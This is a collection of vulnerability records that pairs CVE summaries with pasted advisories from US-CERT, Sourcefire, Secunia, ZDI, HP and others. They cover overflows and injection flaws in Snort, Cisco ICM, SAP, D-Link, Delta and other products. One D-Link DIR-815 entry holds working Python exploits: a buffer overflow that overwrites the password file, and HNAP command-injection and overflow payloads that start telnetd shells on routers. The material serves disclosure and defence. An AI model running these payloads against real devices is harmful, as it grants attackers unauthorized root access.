full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------------------------------------+ \| Revision \| \| Initial \| \| 1.0 \| 2011-September-14 \| public \| \| \| \| release \| +----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (SunOS) iFcDBQFOb9w/QXnnBKKRMNARCBomAP9pCiRwCB8z3oe3IWB2XXNzeaQxAwoq0gQ4 6znwu3lLSAD/Y6o+u8AofSMxkj3THWIdpbjVXKQXMal/BhxDhN5fsI8= =Ybok -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-200702-0378	Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted 'DCE' and 'RPC' network packets. An attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-050A Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow Original release date: February 19, 2007 Last revised: -- Source: US-CERT Systems Affected * Snort 2.6.1, 2.6.1.1, and 2.6.1.2 * Snort 2.7.0 beta 1 * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 Other products that use Snort or Snort components may be affected. I. The DCE/RPC preprocessor reassembles fragmented SMB and DCE/RPC traffic before passing data to the Snort rules. The vulnerable code does not properly reassemble certain types of SMB and DCE/RPC packets. An attacker could exploit this vulnerability by sending a specially crafted TCP packet to a host or network monitored by Snort. The DCE/RPC preprocessor is enabled by default, and it is not necessary for an attacker to complete a TCP handshake. US-CERT is tracking this vulnerability as VU#196240. This vulnerability has been assigned CVE number CVE-2006-5276. Further information is available in advisories from Sourcefire and ISS. II. III. Solution Upgrade Snort 2.6.1.3 is available from the Snort download site. Sourcefire customers should visit the Sourcefire Support Login site. Disable the DCE/RPC Preprocessor To disable the DCE/RPC preprocessor, comment out the line that loads the preprocessor in the Snort configuration file (typically /etc/snort.conf on UNIX and Linux systems): [/etc/snort.conf] ... #preprocessor dcerpc... Restart Snort for the change to take effect. Disabling the preprocessor will prevent Snort from reassembling fragmented SMB and DCE/RPC packets. This may allow attacks to evade the IDS. IV. References * US-CERT Vulnerability Note VU#196240 - <http://www.kb.cert.org/vuls/id/196240> * Sourcefire Advisory 2007-02-19 - <http://www.snort.org/docs/advisory-2007-02-19.html> * Sourcefire Support Login - <https://support.sourcefire.com/> * Sourcefire Snort Release Notes for 2.6.1.3 - <http://www.snort.org/docs/release_notes/release_notes_2613.txt> * Snort downloads - <http://www.snort.org/dl/> * DCE/RPC Preprocessor - <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html> * IBM Internet Security Systems Protection Advisory - <http://iss.net/threats/257.html> * CVE-2006-5276 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-050A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 19, 2007: Initial Release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP qulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq +kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6 OuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w RSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg +EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg== =T7v8 -----END PGP SIGNATURE----- . February 19, 2007 Summary: Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. Sourcefire has prepared updates for Snort open-source software to address this issue. Mitigating Factors: Users who have disabled the DCE/RPC preprocessor are not vulnerable. Recommended Actions: * Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately. * Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2. Workarounds: Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor. Detecting Attacks Against This Vulnerability: Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability. Has Sourcefire received any reports that this vulnerability has been exploited? - No. Sourcefire has not received any reports that this vulnerability has been exploited. Acknowledgments: Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it. ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys-and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV _______________________________________________ Snort-announce mailing list Snort-announce@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/snort-announce . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201011-0225	Multiple stack-based buffer overflows in agent.exe in Setup Manager in Cisco Intelligent Contact Manager (ICM) before 7.0 allow remote attackers to execute arbitrary code via a long parameter in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet, aka Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. The problem is Bug ID CSCti45698 , CSCti45715 , CSCti45726 ,and CSCti46164 It is a problem.By a third party (1) HandleUpgradeAll , (2) AgentUpgrade , (3) HandleQueryNodeInfoReq , (4) HandleUpgradeTrace TCP Arbitrary code could be executed via overly long parameters in the packet. Authentication is not required to exploit this vulnerability. The flaw exists within the Agent.exe component which listens by default on TCP port 40078. When processing the HandleUpgradeAll packet type an unchecked copy of user supplied data is performed into a stack-based buffer of a controlled size. Successful exploitation of this vulnerability leads to remote code execution under the context of the SYSTEM user. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Cisco Intelligent Contact Manager Setup Manager "Agent.exe" Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42146 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42146/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 RELEASE DATE: 2010-11-09 DISCUSS ADVISORY: http://secunia.com/advisories/42146/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42146/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Cisco Intelligent Contact Manager Setup Manager, which can be exploited by malicious people to compromise a vulnerable system. 1) A boundary error within Agent.exe when handling the "HandleUpgradeAll" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 2) A boundary error within Agent.exe when handling the "AgentUpgrade" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 3) A boundary error within Agent.exe when handling the "HandleQueryNodeInfoReq" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 4) A boundary error within Agent.exe when handling the "HandleUpgradeTrace" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. Please see the vendor's advisory for the list of affected versions. SOLUTION: The vendor recommends to delete the Agent.exe file or restrict network access to the affected service. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: sb, reported via ZDI. ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-232/ http://www.zerodayinitiative.com/advisories/ZDI-10-233/ http://www.zerodayinitiative.com/advisories/ZDI-10-234/ http://www.zerodayinitiative.com/advisories/ZDI-10-235/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-232: Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-232 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Cisco -- Affected Products: Cisco Unified Intelligent Contact Management -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9915. -- Vendor Response: Cisco has issued an update to correct this vulnerability. More details can be found at: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-11-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * sb -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
var-201112-0297	Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"<STRING>\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions
var-201507-0645	D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. ## Advisory Information Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. ## Details Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import urllib import urllib2 # This exploits the auth_main.cgi with read buffer overflow exploit for v2.02 # prequisite is just to have id and password fields in params url = 'http://192.168.0.1/authentication.cgi' junk = "A"1004+"B"37+"\x58\xf8\x40\x00" # address of system function in executable junk+="X"164+'echo "Admin" "Admin" "0" > /var/passwd\x00'+"AAAA" values = "id=test&password=test&test="+junk req = urllib2.Request(url, values) response = urllib2.urlopen(req) the_page = response.read() ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct # format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address) buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"H"286 buf+= "\x40\xF4\xB1\x2A" # (ROP gadget which puts right value in A0) buf+= "B"20+"ZZZZ"+"telnetd -p 6778"+"C"5 # adjustment to get to the right payload buf+="\xA0\xb2\xb4\x2a" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("1.2.3.4", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Command injection in ---------------------------------------------------------------------------------------------------------------------- import socket import struct # CSRF or any other trickery, but probably only works when connected to network I suppose buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 99.249.143.124\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.1", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)
var-201803-1810	A Stack-based Buffer Overflow issue was discovered in Delta Electronics Delta Industrial Automation DOPSoft, Version 4.00.01 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dop or .dpb files may allow an attacker to remotely execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation DOPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the BackgroundMacro structure in a DPA file. An attacker can leverage this vulnerability to execute code under the context of the current process. Failed exploit attempts will likely cause a denial-of-service condition. Versions prior to DOPSoft 4.00.04 are vulnerable
var-201809-0087	WECON LeviStudio Versions 1.8.29 and 1.8.44 have multiple stack-based buffer overflow vulnerabilities that can be exploited when the application processes specially crafted project files. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Wecon LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the UserMgr.xml file. When parsing the GroupList ID element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. WECON LeviStudio is a set of human interface programming software from WECON, China
var-200607-0396	Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy Security Manager, (c) Astaro Report Manager, (d) Fortinet FortiReporter, (e) Top Layer Network Security Analyzer, and possibly other products, allow remote attackers to execute arbitrary code via long (1) DELTAINTERVAL, (2) LOGFOLDER, (3) DELETELOGS, (4) FWASERVER, (5) SYSLOGPUBLICIP, (6) GETFWAIMPORTLOG, (7) GETFWADELTA, (8) DELETERDEPDEVICE, (9) COMPRESSRAWLOGFILE, (10) GETSYSLOGFIREWALLS, (11) ADDPOLICY, and (12) EDITPOLICY commands to the Syslog daemon (syslogserver.exe); (13) GUIADDDEVICE, (14) ADDDEVICE, and (15) DELETEDEVICE commands to the Topology server (Topology.exe); the (15) LICMGR_ADDLICENSE command to the License Manager (EnterpriseSecurityAnalyzer.exe); the (16) TRACE and (17) QUERYMONITOR commands to the Monitoring agent (Monitoring.exe); and possibly other vectors related to the Syslog daemon (syslogserver.exe). Used in the following products eIQnetworks Enterprise Security Analyzer (ESA) Is Syslog daemon (syslogserver.exe) A stack-based buffer overflow vulnerability exists due to a flaw in handling. During the processing of long arguments to the LICMGR_ADDLICENSE command a classic stack based buffer overflow occurs. Authentication is not required to exploit this vulnerability.The specific flaw exists within the Syslog daemon, syslogserver.exe, during the processing of long strings transmitted to the listening TCP port. The vulnerability is not exposed over UDP. The default configuration does not expose the open TCP port. eIQnetworks Enterprise Security Analyzer (ESA) is an enterprise-level security management platform. The following commands are known to be affected by this vulnerability: DELTAINTERVAL LOGFOLDER DELETELOGS FWASERVER SYSLOGPUBLICIP GETFWAIMPORTLOG GETFWADELTA DELETERDEPDEVICE COMPRESSRAWLOGFILE GETSYSLOGFIREWALLS ADDPOLICY EDITPOLICY. TSRT-06-03: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerabilities http://www.zerodayinitiative.com/advisories/TSRT-06-03.html July 25, 2006 -- CVE ID: CVE-2006-3838 -- Affected Vendor: eIQnetworks -- Affected Products: eIQnetworks Enterprise Security Analyzer Astaro Report Manager (OEM) Fortinet FortiReporter (OEM) iPolicy Security Reporter (OEM) SanMina Viking Multi-Log Manager (OEM) Secure Computing G2 Security Reporter (OEM) Top Layer Network Security Analyzer (OEM) -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since July 24, 2006 by Digital Vaccine protection filter ID 4319. Authentication is not required to exploit this vulnerability. -- Vendor Response: eIQnetworks has issued an update to correct this vulnerability. More details can be found at: http://www.eiqnetworks.com/products/enterprisesecurity/ EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf -- Disclosure Timeline: 2006.05.10 - Vulnerability reported to vendor 2006.07.24 - Digital Vaccine released to TippingPoint customers 2006.07.25 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Cody Pierce, TippingPoint Security Research Team. -- About the TippingPoint Security Research Team (TSRT): The TippingPoint Security Research Team (TSRT) consists of industry recognized security researchers that apply their cutting-edge engineering, reverse engineering and analysis talents in our daily operations. More information about the team is available at: http://www.tippingpoint.com/security The by-product of these efforts fuels the creation of vulnerability filters that are automatically delivered to our customers' intrusion prevention systems through the Digital Vaccine(R) service. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-201702-0423	An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of data from a LAD file. A crafted length element can trigger an overflow of a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Delta Electronics WPLSoft and others are software control platforms used by Delta Electronics to edit the Delta DVP series of programmable logic controllers (PLCs). A heap buffer overflow vulnerability exists in several Delta Electronics products
var-202305-1588	D-Link DIR-2150 SetNTPServerSettings Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20553. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-201112-0173	The default configuration of the HP CM8060 Color MFP with Edgeline; Color LaserJet 3xxx, 4xxx, 5550, 9500, CMxxxx, CPxxxx, and Enterprise CPxxxx; Digital Sender 9200c and 9250c; LaserJet 4xxx, 5200, 90xx, Mxxxx, and Pxxxx; and LaserJet Enterprise 500 color M551, 600, M4555 MFP, and P3015 enables the Remote Firmware Update (RFU) setting, which allows remote attackers to execute arbitrary code by using a session on TCP port 9100 to upload a crafted firmware update. HP Printers and Digital Senders are prone to a security-bypass vulnerability. An attacker may leverage the issue to remotely install malicious printer firmware. The unauthorized firmware could also cause a Denial of Service to the device. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03102449 Version: 3 HPSBPI02728 SSRT100692 rev.3 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-11-30 Last Updated: 2012-01-09 Potential Security Impact: Remote firmware update enabled by default Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP printers and HP digital senders. References: CVE-2011-4161 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products. A firmware update can be sent remotely to port 9100 without authentication. RESOLUTION The following steps can be taken to avoid unauthorized firmware updates: Update the firmware to a version that implements code signing Disable the Remote Firmware Update The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates. Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table. Firmware updates for any of the products can also be downloaded as follows. Browse to www.hp.com/go/support then: Select "Drivers & Software" Enter the product name listed in the table above into the search field Click on "Search" If the search returns a list of products click on the appropriate product Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" If the "Cross operating system ..." link is not present, select any Windows operating system from the list. Select the appropriate firmware update under "Firmware" HISTORY Version:1 (rev.1) - 30 November 2011 Initial release Version:2 (rev.2) - 23 December 2011 Code signing firmware available Version:3 (rev.3) - 9 January 2012 Combined tables Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk8KykcACgkQ4B86/C0qfVl09ACg1m3AQDGq/VzvFgb4j6bj3fJU VnkAoO9oPSjyrVB07qLIBpcXALxLRRRg =mXzy -----END PGP SIGNATURE----- . However, the information is applicable to all the devices listed above. This revision, version 6, of the Security Bulletin announces the availability of firmware updates for additional devices
var-201103-0371	SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \"url\", \"sWindow\", \"BEGIN_DATE\", \"END_DATE\", \"CURRENT_DATE\" and \"CURRENT_SLICE\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks
var-201706-0017	In FortiClientWindows 5.4.1 and 5.4.2, an attacker may escalate privilege via a FortiClientNamedPipe vulnerability. fortinet's Windows for FortiClient contains vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Fortinet FortiClient is prone to a privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with elevated privileges. FortiClient 5.4.1 and 5.4.2 are vulnerable. Fortinet FortiClient is a mobile terminal security solution developed by Fortinet. The solution provides IPsec and SSL encryption, WAN optimization, endpoint compliance, and two-factor authentication when connected to FortiGate firewall appliances
